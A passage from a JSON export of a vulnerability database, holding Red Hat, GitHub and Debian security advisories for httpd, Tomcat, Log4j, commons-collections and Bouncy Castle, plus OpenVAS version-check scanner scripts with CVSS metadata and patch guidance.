Fix(es):\n\n* The httpd package installation script tried to create both the \"apache\" user and group in a single \"useradd\" command. Consequently, when the \"apache\" group had already been created on the system, the command failed, and the \"apache\" user was not created. To fix this bug, the \"apache\" group is now created by a separate command, and the \"apache\" user is correctly created during httpd installation even when the \"apache\" group exists. (BZ#1486843)\n\n* When installing the httpd24 Software Collection using the \"yum\" command, if the \"apache\" group already existed on the system with GID other than 48, the \"apache\" user was not created. This update fixes the bug. (BZ#1487164)\n\n* With this update, it is possible to run the mod_rewrite external mapping program as a non-root user. (BZ#1486832)\n\n* On a Red Hat Enterprise Linux 6 system, when the httpd service was stopped twice in a row by running the \"service httpd stop\" command, a misleading message was returned: \"Stopping httpd: [FAILED]\". This bug has been fixed. (BZ#1418395)\n\n* When the \"service httpd24-httpd graceful\" command was used on Red Hat Enterprise Linux 7 while the httpd24-httpd service was not running, the daemon was started without being tracked by systemd. As a consequence, the daemon ran in an incorrect SELinux domain. This bug has been fixed, and the httpd daemon runs in the correct SELinux domain in the described scenario. (BZ#1440858)\n\nEnhancement(s):\n\n* With this update, the mod_ssl module supports the ALPN protocol on Red Hat Enterprise Linux 7.4 and later versions. (BZ#1327548)\n\nFor further details, see the Red Hat Software Collections 3.0 Release Notes linked from the References section.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}}, "published": "2017-10-24T08:16:35", "type": "redhat", "title": "(RHSA-2017:3018) Moderate: httpd24 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2018-06-12T21:28:16", "id": "RHSA-2017:3018", "href": "https://access.redhat.com/errata/RHSA-2017:3018", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-29T10:41:39", "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno B\u00f6ck for reporting this issue.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}}, "published": "2017-10-11T15:17:48", "type": "redhat", "title": "(RHSA-2017:2882) Moderate: httpd security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2018-04-11T23:32:53", "id": "RHSA-2017:2882", "href": "https://access.redhat.com/errata/RHSA-2017:2882", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "github": [{"lastseen": "2023-12-06T17:30:36", "description": "The Bouncy Castle Java library before 1.51 does not validate a point is withing the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an \"invalid curve attack.\"", "cvss3": {}, "published": "2018-10-17T16:27:50", "type": "github", "title": "Moderate severity vulnerability that affects org.bouncycastle:bcprov-jdk14 and org.bouncycastle:bcprov-jdk15", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7940"], "modified": "2023-01-09T05:02:41", "id": "GHSA-4MV7-CQ75-3QJM", "href": "https://github.com/advisories/GHSA-4mv7-cq75-3qjm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T17:28:33", "description": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T01:25:20", "type": "github", "title": "Deserialization of Untrusted Data in Apache commons collections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2023-11-02T22:53:04", "id": "GHSA-FJQ5-5J5F-MVXH", "href": "https://github.com/advisories/GHSA-fjq5-5j5f-mvxh", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T17:30:19", "description": "In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-06T18:43:38", "type": "github", "title": "Deserialization of Untrusted Data in Log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5645"], "modified": "2023-02-01T05:02:44", "id": "GHSA-FXPH-Q3J8-MV87", "href": "https://github.com/advisories/GHSA-fxph-q3j8-mv87", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-08T23:28:05", "description": "When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.9}, "published": "2022-05-14T01:07:15", "type": "github", "title": "Unrestricted Upload of File with Dangerous Type Apache Tomcat", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12617"], "modified": "2023-12-08T23:04:11", "id": "GHSA-XJGH-84HX-56C5", "href": "https://github.com/advisories/GHSA-xjgh-84hx-56c5", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2023-12-06T19:15:55", "description": "Package : bouncycastle\nVersion : 1.44+dfsg-2+deb6u1\nCVE ID : CVE-2015-7940\nDebian Bug : 802671\n\nThe Bouncy Castle Java library before 1.51 does not validate that a point\nis within the elliptic curve, which makes it easier for remote attackers\nto obtain private keys via a series of crafted elliptic curve Diffie\nHellman (ECDH) key exchanges, aka an "invalid curve attack."\n\nFor Debian 6 \u201cSqueeze\u201d, this issue has been fixed in version\n1.44+dfsg-2+deb6u1 of bouncycastle.\n\nMany thanks to upstream author Peter Dettmann who reviewed the backport\nthat we prepared.\n\n-- \nRapha\u00ebl Hertzog \u25c8 Debian Developer\n\nSupport Debian LTS: http://www.freexian.com/services/debian-lts.html\nLearn to master Debian: http://debian-handbook.info/get/\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {}, "published": "2015-12-08T11:28:10", "type": "debian", "title": "[SECURITY] [DLA 361-1] bouncycastle security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7940"], "modified": "2015-12-08T11:28:10", "id": "DEBIAN:DLA-361-1:E2323", "href": "https://lists.debian.org/debian-lts-announce/2015/12/msg00001.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-07T11:48:06", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3417-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nDecember 14, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bouncycastle\nCVE ID : CVE-2015-7940\nDebian Bug : 802671\n\nTibor Jager, J\u00c3\u00b6rg Schwenk, and Juraj Somorovsky, from Horst G\u00c3\u00b6rtz\nInstitute for IT Security, published a paper in ESORICS 2015 where they\ndescribe an invalid curve attack in Bouncy Castle Crypto, a Java library\nfor cryptography. An attacker is able to recover private Elliptic Curve\nkeys from different applications, for example, TLS servers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html\nPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.44+dfsg-3.1+deb7u1.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.49+dfsg-3+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.51-2.\n\nWe recommend that you upgrade your bouncycastle packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-12-14T12:51:06", "type": "debian", "title": "[SECURITY] [DSA 3417-1] bouncycastle security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7940"], "modified": "2015-12-14T12:51:06", "id": "DEBIAN:DSA-3417-1:D5725", "href": "https://lists.debian.org/debian-security-announce/2015/msg00322.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-22T13:34:08", "description": "Package : apache2\nVersion : 2.2.22-13+deb7u12\nCVE ID : CVE-2017-9798\nDebian Bug : 876109\n\nHanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n2.2.22-13+deb7u12.\n\nWe recommend that you upgrade your apache2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-09-21T20:42:18", "type": "debian", "title": "[SECURITY] [DLA 1102-1] apache2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2017-09-21T20:42:18", "id": "DEBIAN:DLA-1102-1:511F7", "href": "https://lists.debian.org/debian-lts-announce/2017/09/msg00019.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T18:53:22", "description": "Package : tomcat7\nVersion : 7.0.28-4+deb7u16\nCVE ID : CVE-2017-12617\n\n\nA remote code execution vulnerability has been discovered in tomcat7.\n\nWhen HTTP PUT was enabled (e.g., via setting the readonly initialization\nparameter of the Default servlet to false) it was possible to upload a JSP\nfile to the server via a specially crafted request. This JSP could then be\nrequested and any code it contained would be executed by the server.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.0.28-4+deb7u16.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T19:01:17", "type": "debian", "title": "[SECURITY] [DLA 1166-1] tomcat7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12617"], "modified": "2017-11-07T19:01:17", "id": "DEBIAN:DLA-1166-1:E77EB", "href": "https://lists.debian.org/debian-lts-announce/2017/11/msg00009.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T22:40:33", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3417-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nDecember 14, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bouncycastle\nCVE ID : CVE-2015-7940\nDebian Bug : 802671\n\nTibor Jager, J\u00c3\u00b6rg Schwenk, and Juraj Somorovsky, from Horst G\u00c3\u00b6rtz\nInstitute for IT Security, published a paper in ESORICS 2015 where they\ndescribe an invalid curve attack in Bouncy Castle Crypto, a Java library\nfor cryptography. An attacker is able to recover private Elliptic Curve\nkeys from different applications, for example, TLS servers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html\nPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.44+dfsg-3.1+deb7u1.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.49+dfsg-3+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.51-2.\n\nWe recommend that you upgrade your bouncycastle packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-12-14T12:51:06", "type": "debian", "title": "[SECURITY] [DSA 3417-1] bouncycastle security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7940"], "modified": "2015-12-14T12:51:06", "id": "DEBIAN:DSA-3417-1:682B4", "href": "https://lists.debian.org/debian-security-announce/2015/msg00322.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:33:49", "description": "The host is running Oracle WebCenter Content\n and is prone to an unspecified vulnerability.", "cvss3": {}, "published": "2018-03-06T00:00:00", "type": "openvas", "title": "Oracle WebCenter Content Unspecified Vulnerability-01 (cpujan2018-3236628)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-2564"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310812959", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812959", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebCenter Content Unspecified Vulnerability-01 (cpujan2018-3236628)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:webcenter_content\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812959\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-2564\");\n script_bugtraq_id(102541);\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-06 11:17:44 +0530 (Tue, 06 Mar 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\"); ##Patch is available as solution\n script_name(\"Oracle WebCenter Content Unspecified Vulnerability-01 (cpujan2018-3236628)\");\n\n script_tag(name:\"summary\", value:\"The host is running Oracle WebCenter Content\n and is prone to an unspecified vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaws exist due to error in the 'Content\n Server' component.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n can result in unauthorized creation, deletion or modification access to critical\n data or all Oracle WebCenter Content accessible data as well as unauthorized read\n access to a subset of Oracle WebCenter Content accessible data.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebCenter Content version 11.1.1.9.0\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_webcenter_content_detect.nasl\");\n script_mandatory_keys(\"Oracle/WebCenter/Content/Version\");\n script_require_ports(\"Services/www\", 80, 443);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!webPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:webPort, exit_no_version:TRUE)) exit(0);\nwebVer = infos['version'];\npath = infos['location'];\n\nif(webVer == \"11.1.1.9.0\")\n{\n report = report_fixed_ver(installed_version:webVer, fixed_version: \"Apply the patch\", install_path:path);\n security_message(port:webPort, data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:07", "description": "Mageia Linux Local Security Checks mgasa-2016-0012", "cvss3": {}, "published": "2016-01-14T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0012", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-03-14T00:00:00", "id": "OPENVAS:1361412562310131177", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131177", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0012.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131177\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-01-14 07:28:50 +0200 (Thu, 14 Jan 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0012\");\n script_tag(name:\"insight\", value:\"It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library (CVE-2015-7501). With this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property org.apache.commons.collections.enableUnsafeSerialization to re-enable their deserialization.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0012.html\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0012\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"apache-commons-collections\", rpm:\"apache-commons-collections~3.2.1~24.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:36", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "openvas", "title": "RedHat Update for apache-commons-collections RHSA-2015:2522-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310871511", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871511", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for apache-commons-collections RHSA-2015:2522-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n 